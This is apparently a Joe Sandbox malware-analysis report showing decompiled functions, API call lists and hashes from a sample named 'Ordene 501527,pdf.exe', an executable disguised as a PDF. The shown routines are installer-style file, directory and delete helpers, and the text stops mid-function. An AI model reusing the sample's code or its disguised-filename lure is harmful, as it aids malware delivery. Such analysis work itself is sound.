Function 00405D2C Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D2C(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d31
0x00405d37
0x00405d3c
0x00405d45
0x00405d45
0x00405d4e

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00405931,00000000,?,00000000,00405B07,?,?,?,?), ref: 00405D31
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D45

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 706934cb3b0fb70b74806e5ec6ddb1c8dfd6769152cd575e6ec3c276ff28a2a3
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 85D01272504420AFD6512738EF0C89BBF95DB543717028B36FAE9A22F0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040580F Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040580F(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405815
0x0040581d
0x00000000
0x00405823
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75173420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD4 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DD4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dd8
0x00405de8
0x00405df0
0x00000000
0x00405df7
0x00000000
0x00405df9

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403305,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405DE8

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E03(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e07
0x00405e17
0x00405e1f
0x00000000
0x00405e26
0x00000000
0x00405e28

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E17

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00404240 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404240(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a79f8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404240
0x00404247
0x00404252
0x00000000
0x00404252
0x00404258

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404252

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D

Uniqueness

Uniqueness Score: -1.00%

Function 00403308 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403308(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403316
0x0040331c

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404229 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404229(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a28, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404237
0x0040423d

APIs

SendMessageW.USER32(00000028,?,00000001,00404054), ref: 00404237

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404216(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f1c, _a4); // executed
				return _t2;
			}

0x00404220
0x00404226

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040596D(void* __ecx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t67 = __ecx;
				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C38(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040625F(0x7a3f28, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B7C(_t68);
					} else {
						lstrcatW(0x7a3f28, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f28,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040625F(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405925(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052C3(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ac8 =  *0x7a8ac8 + 1;
										} else {
											E004052C3(0xfffffff1, _t68);
											E00406025(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040596D(_t67, __eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f28 - 0x5c;
					if( *0x7a3f28 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004065A2(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B30(_t68);
							_t38 = E00405925(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052C3(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052C3(0xfffffff1, _t68);
							return E00406025(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ac8 =  *0x7a8ac8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x0040596d
0x00405977
0x0040597c
0x00405985
0x00405988
0x00405990
0x00405993
0x00405996
0x0040599e
0x004059a0
0x004059a1
0x00000000
0x004059a1
0x004059ac
0x004059af
0x004059af
0x004059af
0x004059b3
0x004059c6
0x004059cd
0x004059d2
0x004059d6
0x004059e6
0x004059d8
0x004059de
0x004059de
0x004059eb
0x004059ef
0x004059fb
0x00405a01
0x00405a06
0x00405a0c
0x00405a17
0x00405a1d
0x00405a1f
0x00405a22
0x00405acc
0x00405acc
0x00405ad0
0x00405ad2
0x00405ad2
0x00405ad2
0x00405ad2
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a28
0x00405a28
0x00405a28
0x00405a30
0x00405a50
0x00405a58
0x00405a5d
0x00405a64
0x00405a7f
0x00405a84
0x00405a86
0x00405aaa
0x00405a88
0x00405a88
0x00405a8b
0x00405a9f
0x00405a8d
0x00405a90
0x00405a98
0x00405a98
0x00405a8b
0x00405a66
0x00405a6c
0x00405a6e
0x00405a74
0x00405a74
0x00405a6e
0x00000000
0x00405a64
0x00405a32
0x00405a3a
0x00000000
0x00000000
0x00405a3c
0x00405a44
0x00000000
0x00000000
0x00405a46
0x00405a4e
0x00000000
0x00000000
0x00000000
0x00405aaf
0x00405ab7
0x00405abd
0x00405abd
0x00405ac6
0x00000000
0x00405ac6
0x004059f1
0x004059f9
0x00000000
0x00000000
0x00000000
0x004059b5
0x004059b5
0x004059b7
0x00405ad7
0x00405ad9
0x00405adc
0x00405b2d
0x00405b2d
0x00405b2d
0x00405ade
0x00405ae1
0x00405aec
0x00405af1
0x00405af3
0x00000000
0x00000000
0x00405af6
0x00405b02
0x00405b07
0x00405b09
0x00000000
0x00405b24
0x00405b0b
0x00405b0e
0x00000000
0x00000000
0x00405b13
0x00000000
0x00405b1a
0x00405ae3
0x00405ae3
0x00000000
0x00405ae3
0x004059bd
0x004059c0
0x00000000
0x00000000
0x00000000
0x004059c0

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75173420,00000000), ref: 00405996
lstrcatW.KERNEL32(007A3F28,\*.*), ref: 004059DE
lstrcatW.KERNEL32(?,0040A014), ref: 00405A01
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A07
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A17
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AB7
FindClose.KERNEL32(00000000), ref: 00405AC6

Strings

(?z, xrefs: 004059C6
"C:\Users\user\Desktop\Ordene 501527,pdf.exe" , xrefs: 0040596D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
\*.*, xrefs: 004059D8

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" $(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-828209711
Opcode ID: 8af6f17b860d75df9dd1849f78f1a3668834751c3c4c83c34c501c28ea95214b
Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
Opcode Fuzzy Hash: 8af6f17b860d75df9dd1849f78f1a3668834751c3c4c83c34c501c28ea95214b
Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405EAB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EAB(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a55c0 = 0x55004e;
				 *0x7a55c4 = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x7a5dc0, 0x400);
